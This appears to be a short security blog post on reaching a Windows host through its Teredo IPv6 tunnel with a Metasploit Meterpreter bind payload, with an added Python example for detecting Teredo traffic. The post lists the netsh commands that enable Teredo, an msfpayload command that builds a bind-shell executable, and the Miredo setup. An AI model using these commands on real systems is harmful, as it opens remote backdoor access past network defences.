
Meterpreter and Teredo to Make Your Perimeter Useless

Teredo is a tunneling service built in to Windows. Its intent was to give anyone access to the IPv6-enabled internet, free and dead simple, with no infrastructure changes needed. Basically, an internal host asks a Teredo server/relay for an IPv6 address. It does this over UDP, by default in Windows over port 3544.

When the tunnel is established, the host is given a 2001::/32 address. This address is a public IP. This essentially meant that your Windows shares and any other listening services were publicly available, despite your NAT and firewall. Unfortunately, Microsoft has issued a patch for this that denies all traffic from NAT traversals (Teredo). However, you can still connect to your server over NAT traversal with the help of the bind_ipv6_tcp payload in Metasploit.
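
As an added example (not from the original post), this Python sketch shows how a defender can spot Teredo use in flow records: it flags UDP traffic to port 3544 and decodes any 2001::/32 address into the Teredo server and the NAT-mapped IPv4 address and port that RFC 4380 embeds in it. The record format, function names and sample addresses are assumptions constructed for illustration.

```python
import ipaddress

TEREDO_PREFIX = ipaddress.ip_network("2001::/32")
TEREDO_PORT = 3544  # default Teredo server port (UDP), as stated above

# Constructed flow records (proto,src,sport,dst,dport); documentation-range IPs.
SAMPLE_FLOWS = """\
udp,10.0.0.23,51515,203.0.113.9,3544
tcp,10.0.0.23,49200,198.51.100.7,443
tcp,2001:0:cb00:7109:0:fbd6:3fff:fdf5,50000,2001:0:cb00:7109:8000:d8ef:3fff:fdd2,9001
"""

def decode_teredo(addr):
    """Return the fields embedded in a Teredo address, or None if not in 2001::/32."""
    ip = ipaddress.ip_address(addr)
    if ip.version != 6 or ip not in TEREDO_PREFIX:
        return None
    raw = ip.packed
    return {
        "server": str(ipaddress.IPv4Address(raw[4:8])),
        "flags": int.from_bytes(raw[8:10], "big"),
        # RFC 4380 stores the NAT-mapped port and IPv4 address bit-inverted.
        "nat_port": int.from_bytes(raw[10:12], "big") ^ 0xFFFF,
        "nat_ip": str(ipaddress.IPv4Address(
            int.from_bytes(raw[12:16], "big") ^ 0xFFFFFFFF)),
    }

def find_teredo(flows):
    """Flag Teredo setup traffic (UDP/3544) and any 2001::/32 endpoint."""
    findings = []
    for line in flows.strip().splitlines():
        proto, src, sport, dst, dport = line.split(",")
        if proto == "udp" and int(dport) == TEREDO_PORT:
            findings.append(("teredo-setup", src, dst))
        for endpoint in (src, dst):
            info = decode_teredo(endpoint)
            if info:
                findings.append(("teredo-endpoint", endpoint, info))
    return findings

if __name__ == "__main__":
    for finding in find_teredo(SAMPLE_FLOWS):
        print(finding)
```

At the perimeter the tunneled IPv6 traffic is encapsulated in UDP, so the 2001::/32 endpoints are normally only visible in host-level connection logs.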

The commands used in the video are below:

netsh interface ipv6 install

netsh interface ipv6 set teredo enterpriseclient

./msfpayload windows/meterpreter/bind_ipv6_tcp LPORT=9001 X > bind.exe

The only thing that was behind the scenes was giving the Metasploit host an IPv6 address. I used Miredo (Teredo for *nix/OSX):

#Install miredo
apt-get install miredo

#Remove it from starting automatically
update-rc.d -f miredo remove

